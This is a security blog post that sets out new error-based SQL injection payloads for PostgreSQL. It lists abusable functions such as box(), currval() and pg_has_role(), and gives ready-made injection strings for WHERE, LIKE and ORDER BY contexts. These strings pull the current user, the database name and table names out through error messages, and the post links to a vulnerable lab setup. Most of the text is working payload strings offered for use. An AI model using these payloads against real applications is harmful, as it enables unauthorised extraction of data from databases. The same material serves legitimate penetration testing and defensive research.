New payloads to exploit Error-based SQL injection - PostgreSQL database

 Pranaam to all 🙏

In previous blogpost  we explored a new payload to exploit error-based SQL injection in Oracle database. Now let's go for PostgreSQL related stuff as initially I was working on it only.

Before proceeding, just one meme 😅 

Lab setup:

    👉 PHP  

    👉 PostgreSQL Database

    👉 Apache web server

Sample vulnerable PHP code and database dump are available on my Github account:

https://github.com/incredibleindishell/SQLI_b0x/tree/main/PostgreSQL

In my case, I have vulnerable API with following scenarions:

Select statement:

    👉 Where clause

    👉 Like clause

    👉 Order by clause

    

Functions which are our friend 😍

During the experiment phase, I found multiple database function which can be used to perform exploitation of error-based SQL Injection in case of PostgreSQL Database.

Here Goes the list:

1. box
2. currval
3. setval
4. nextval
5. polygon
6. circle
7. path
8. point
9. lseg
10. pg_has_role
11. pg_get_viewdef
12. has_database_privilege
13. has_any_column_privilege

ETC.

box()

box keyword is my favorite 😎so I am gonna pick this one. 

Select Statement - Where Clause 

Lets start with case of Where clause when user supplied data is getting pass as value to where clause in a Select statement. For example, below mentioned is the vulnerable SQL query:

 SELECT * FROM admins where id=User_Supplied_Data

To exploit this injection point we can use below mentioned payload to execute SQL query and force Database to reveal the output in Database error message:

👉 Payload to extract the current SQL server username:

  and ''=''||box(user)

👉 Payload to extract the name of current database:

  and ''=''||box(current_database())

👉 Payload to extract the name of first table in current database:

  and ''=''||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))

Select Statement - Like Clause : 

Lets start with case of Like clause when user supplied data is getting pass to like clause in a Select statement. For example, below mentioned is the vulnerable SQL query:

SELECT * FROM admins where handle like 'User_Supplied_data%'

How to exploit it? There we go..

👉 Payload to extract the current SQL server username:

'||box(current_database())--+

👉 Payload to extract the name of first table in current database:

'||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))--+

Select Statement - Order By Clause : 

Let's suppose, we have below mentioned vulnerable SQL query:

SELECT * FROM admins order by User_Supplied_Data

👉 Payload to extract the current SQL server  username:

(select 1 from box(user))

👉 Payload to extract the name of first table in current database:

(select 1 from box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0)))

Other Functions usage

Similarly, we can use below mentioned PostgreSQL functions as well to exploit error based SQL Injection. All we need to do is, just replace the box() with any of the functions mentioned below and change the SQL query/variable mentioned in them (current_database()) with the one which we want : 

Different functions to extract the current database:

row_security_active(concat('~',current_database(),'~')) pg_has_role(1337,user) polygon(concat('~',current_database(),'~')) currval(concat('~',current_database(),'~')) nextval(concat('~',current_database(),'~')) setval(concat('~',current_database(),'~'),1337) path(concat('~',current_database(),'~')) lseg(concat('~',current_database(),'~')) point(concat('~',current_database(),'~')) has_database_privilege(1337,user) ... ...

For now, we are done and I will be back with some new stuff. 
Thanks for your time. 

With Love from 

❤️ --==[ IndiShell-Lab ]]==-- ❤️